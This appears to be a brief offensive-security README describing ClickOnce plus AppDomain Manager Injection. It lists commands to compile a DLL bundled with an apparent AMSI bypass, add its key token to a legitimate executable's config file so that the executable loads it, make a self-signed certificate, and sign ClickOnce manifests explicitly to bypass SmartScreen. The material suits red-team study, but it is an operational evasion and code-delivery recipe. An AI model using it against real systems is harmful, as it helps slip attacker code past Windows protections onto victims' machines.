ClickOnce + AppDomain Manager Injection
Based on https://github.com/Mr-Un1k0d3r/.NetConfigLoader
csc.exe /t:library /keyfile:key.snk /out:uevmonitor.dll uevmonitor.cs amsi.cs
"[System.Reflection.AssemblyName]::GetAssemblyName("uevmonitor.dll").FullName"
uevmonitor, Version=0.0.0.0, Culture=neutral, PublicKeyToken=1bb626af4620f3e6
Add PublicKeyToken to Filehistory.exe.config
makecert -r -pe -n "CN=test" -ss CA -sr CurrentUser -a sha256 -cy authority -sky signature -sv cert.pvk CA.cer
pvk2pfx -pvk cert.pvk -spc CA.cer -pfx CA.pfx -po "test"
MageUI.exe
Create application manifest:
Sign and save the application manifest:
Create deployment manifest:
Add the application manifest:
Sign and save the deployment manifest:
Launch the ClickOnce application to bypass Smart Screen: